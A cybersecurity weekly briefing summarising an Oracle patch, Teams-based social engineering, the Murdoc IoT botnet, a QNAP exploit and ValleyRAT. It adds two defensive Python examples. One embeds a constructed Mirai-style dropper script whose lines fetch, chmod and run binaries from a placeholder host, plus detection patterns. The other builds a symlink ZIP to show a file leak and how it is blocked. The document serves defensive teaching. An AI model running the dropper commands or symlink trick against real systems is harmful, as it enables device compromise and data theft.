Cyber Security Weekly Briefing, 18-24 January
Oracle patches more than 300 vulnerabilities, multiple critical ones
Oracle patched 318 security vulnerabilities in its Critical Patch Update Advisory for January. Among the products that received updates, Oracle Communications had the most vulnerabilities patched, a total of 85. However, the most severe flaw affects the Oracle Agile Product Lifecycle Management (PLM) Framework: it is tracked as CVE-2025-21556 and has a CVSSv3 score of 9.9.
It is easily exploitable by a low-privileged attacker with network access over HTTP and allows a takeover of the affected software. Other critical vulnerabilities fixed in this patch include CVE-2025-21524 and CVE-2023-3961, both rated CVSSv3 9.8 by Oracle and affecting JD Edwards EnterpriseOne Tools.
The vendor urges customers to upgrade to the latest version of the affected products.
New campaigns of attackers posing as Microsoft support
Sophos researchers have observed the threat actors STAC5143 and STAC5777, which have connections to FIN7, posing as Microsoft Teams technical support to trick employees, steal data and deploy ransomware on corporate networks. The attackers take advantage of the default Teams configuration, which lets users from external domains message and call employees, and start the infection chain by sending phishing emails.
The target then receives an external Teams call and is persuaded to start a remote screen-control session in Teams. The attacker next drops a Java archive and Python scripts (the RPivot backdoor) hosted on an external SharePoint link, and downloads a legitimate ProtonVPN executable that sideloads a malicious DLL; the DLL opens an encrypted C2 channel that gives the attacker remote access to the device. Restricting external access in Teams, or allow-listing only trusted federated domains, breaks this chain at its first step.
Murdoc Botnet targets IoT devices to conduct DDoS attacks
Researchers at Qualys have warned of a new large-scale campaign that exploits security flaws in Huawei HG532 routers and AVTECH IP cameras to enlist the devices in the Murdoc Botnet, a Mirai variant. The campaign has been active since at least July 2024 and has infected more than 1,370 systems, most of them in Malaysia, Mexico, Thailand, Indonesia and Vietnam.
The botnet exploits vulnerabilities such as CVE-2017-17215 (Huawei HG532) and CVE-2024-7029 (AVTECH cameras) to gain initial access to the IoT devices and download a shell script for the next stage. That script in turn fetches the bot binary from the botnet's infrastructure and runs the build that matches the device's CPU architecture. The ultimate goal is to use the botnet to carry out DDoS attacks.
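The "fetch a binary per CPU architecture, chmod it, run it, delete it" shell script described above is the part of a Mirai-style infection that is easiest to catch on a device or a sandbox. The following is an added example, not code from Qualys or from the Murdoc campaign: a small Python analyzer that pulls the download hosts, the architecture-named binaries and the fetch-chmod-execute pattern out of a shell script and returns a verdict. The dropper text is constructed for illustration (the 198.51.100.23 address is an RFC 5737 documentation address), and the architecture name list and scoring thresholds are assumptions, not Murdoc's actual behaviour.

```python
import json
import re

# Constructed sample in the shape of a Mirai-family dropper (not the real Murdoc
# script): one download-chmod-execute-delete line per CPU architecture, so the
# binary matching the device's CPU runs and the others fail harmlessly.
# 198.51.100.23 is an RFC 5737 documentation address, not a real C2 host.
SAMPLE_DROPPER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.23/bins/x86 -O x86; chmod +x x86; ./x86 huawei; rm -rf x86
wget http://198.51.100.23/bins/mips -O mips; chmod +x mips; ./mips huawei; rm -rf mips
wget http://198.51.100.23/bins/mipsel -O mipsel; chmod +x mipsel; ./mipsel huawei; rm -rf mipsel
wget http://198.51.100.23/bins/arm7 -O arm7; chmod +x arm7; ./arm7 huawei; rm -rf arm7
curl -O http://198.51.100.23/bins/arm5; chmod 777 arm5; ./arm5 huawei; rm -rf arm5
"""

# Binary names Mirai-style loaders commonly use, one per target CPU (assumed list).
ARCH_TOKENS = {"x86", "x86_64", "i586", "i686", "mips", "mipsel", "mips64",
               "arm", "arm5", "arm6", "arm7", "aarch64", "ppc", "sh4", "m68k", "spc"}
# Directories droppers cd into because they are writable on most embedded Linux builds.
WRITABLE_DIRS = ("/tmp", "/var/run", "/mnt", "/dev/shm", "/root")

URL_RE = re.compile(r"\b(?:https?|tftp|ftp)://[^\s;'\"]+")
# "fetch ; chmod (+x or octal) ; ./run" on a single line.
FETCH_CHMOD_EXEC_RE = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^\n]*;\s*chmod\s+(?:\+x|[0-7]{3,4})\s+\S+;\s*\./\S+")


def analyze_dropper(script):
    """Extract loader indicators from a shell script and return them with a verdict."""
    urls = sorted(set(URL_RE.findall(script)))
    hosts = sorted({u.split("/")[2] for u in urls})
    # The last path component of each URL is the binary name; keep the arch-named ones.
    archs = sorted({u.rsplit("/", 1)[-1] for u in urls
                    if u.rsplit("/", 1)[-1] in ARCH_TOKENS})
    fetch_chmod_exec = len(FETCH_CHMOD_EXEC_RE.findall(script))
    cd_writable = any(re.search(r"\bcd\s+" + re.escape(d) + r"\b", script)
                      for d in WRITABLE_DIRS)
    self_delete = len(re.findall(r"\brm\s+-r?f\s+", script))
    # Thresholds are assumptions: three or more architectures fetched and run
    # from one script is the signature of a multi-arch IoT loader, not of admin tooling.
    multi_arch = len(archs) >= 3
    verdict = ("mirai_like_dropper" if multi_arch and fetch_chmod_exec >= 3
               else "no_dropper_pattern")
    return {
        "urls": urls,
        "hosts": hosts,
        "architectures": archs,
        "fetch_chmod_exec": fetch_chmod_exec,
        "cd_writable": cd_writable,
        "self_delete": self_delete,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(json.dumps(analyze_dropper(SAMPLE_DROPPER), indent=2))
```

The hosts list is what you feed to an egress block or a DNS sinkhole; the architecture list tells you which device classes the operator is targeting. Run the analyzer over anything written to /tmp or /var/run on an embedded device, or over the script body captured by a honeypot, rather than over binaries, since the script is plain text and changes far less often than the packed bot binary.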
PoC exploit released for a QNAP vulnerability
GitHub user C411e has published a new exploit for CVE-2024-53691, rated CVSSv4 8.7 by the vendor and reported in April 2024. The flaw affects QNAP's QTS and QuTS hero operating systems and allows a remote attacker to access the file system and execute arbitrary code on affected devices.
The PoC breaks exploitation of CVE-2024-53691 into several steps: the attacker first creates a symlink pointing at a sensitive file, compresses it into a ZIP archive and uploads the archive to the QNAP device through the web interface, so that the extracted entry gives access to the target file. A payload containing a reverse shell is then crafted, letting the attacker establish a remote connection to the system and escalate privileges to administrator.
Patches for this vulnerability were released in September 2024; devices still running an unpatched release are now exposed to a public exploit and should be updated.
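The first step of the PoC, a symlink smuggled inside a ZIP, is a generic archive-handling bug rather than anything QNAP-specific, so the check is worth having in any service that accepts uploaded archives. The block below is an added example, not the published PoC and not QNAP code: it builds a ZIP whose only member is a symlink, shows that an extractor which honours the symlink bit (as `unzip` does) exposes the target file, and then shows the audit a hardened extractor runs before writing anything. The "sensitive file" is a constructed stand-in in a temporary directory, and the function names are this example's own.

```python
import os
import stat
import tempfile
import zipfile

# A ZIP member is a symlink when the Unix mode stored in the high 16 bits of
# external_attr has S_IFLNK set; the member's data is the link target.
SYMLINK_MODE = stat.S_IFLNK | 0o777


def build_symlink_zip(zip_path, link_name, target):
    """Write a ZIP whose only member is a symlink `link_name` -> `target`."""
    info = zipfile.ZipInfo(link_name)
    info.create_system = 3                    # 3 = Unix, so extractors honour the mode bits
    info.external_attr = SYMLINK_MODE << 16
    with zipfile.ZipFile(zip_path, "w") as zf:
        zf.writestr(info, target)             # link target stored as the member's content
    return zip_path


def is_symlink_member(info):
    return stat.S_ISLNK(info.external_attr >> 16)


def is_traversal(name):
    """True for absolute names or any '..' component (the classic zip-slip case)."""
    parts = name.replace("\\", "/").split("/")
    return name.startswith("/") or ".." in parts


def audit_zip(zip_path):
    """Return (member, reason) for every member a safe extractor must refuse."""
    findings = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if is_symlink_member(info):
                target = zf.read(info).decode(errors="replace")
                findings.append((info.filename, "symlink -> " + target))
            elif is_traversal(info.filename):
                findings.append((info.filename, "path traversal"))
    return findings


def naive_extract(zip_path, dest):
    """Extractor that recreates symlinks, i.e. the behaviour the PoC relies on."""
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if is_symlink_member(info):
                os.symlink(zf.read(info).decode(), os.path.join(dest, info.filename))
            else:
                zf.extract(info, dest)


def safe_extract(zip_path, dest):
    """Refuse the whole archive if any member is a symlink or escapes `dest`."""
    findings = audit_zip(zip_path)
    if findings:
        raise ValueError(f"refusing to extract {zip_path}: {findings}")
    with zipfile.ZipFile(zip_path) as zf:
        zf.extractall(dest)


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.conf")
        with open(secret, "w") as f:
            f.write("admin_password=hunter2\n")      # constructed stand-in for a sensitive file
        zpath = build_symlink_zip(os.path.join(tmp, "evil.zip"), "notes.txt", secret)

        upload_dir = os.path.join(tmp, "upload")
        os.mkdir(upload_dir)
        naive_extract(zpath, upload_dir)
        with open(os.path.join(upload_dir, "notes.txt")) as f:
            leaked = f.read()                        # reading "notes.txt" follows the link

        try:
            safe_extract(zpath, os.path.join(tmp, "safe"))
            blocked = False
        except ValueError:
            blocked = True
        return {"leaked": leaked, "findings": audit_zip(zpath), "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

Python's own `ZipFile.extractall` does not create symlinks (it writes the target string out as a regular file), which is why the example needs `naive_extract` to reproduce what a symlink-aware extractor does. The audit runs over the central directory before any file is written, so a single bad member rejects the whole upload rather than leaving a partial extraction behind.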
New ValleyRAT campaign targeting Chinese-speaking users
Researchers at Intezer Labs have detected a new campaign of cyber-attacks using the ValleyRAT remote access Trojan against Chinese-speaking regions, notably Hong Kong, Taiwan and mainland China. The attacks start with phishing pages from which users download a malicious Microsoft Installer (MSI) package posing as legitimate software.
Once executed, the installer deploys a benign application to avoid suspicion while silently extracting an encrypted file that contains the malware payload. ValleyRAT is delivered through a multi-stage loader called PNGPlug, whose main purpose is to prepare the environment for the main malware and to establish persistence. The MSI package uses the Windows Installer CustomAction feature to run malicious code, and uses the password 'hello202411' to extract the main malware components from the encrypted archive.
ValleyRAT, first detected in 2023, gives the operator unauthorized access to and control over infected machines and is attributed to the Silver Fox threat actor.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →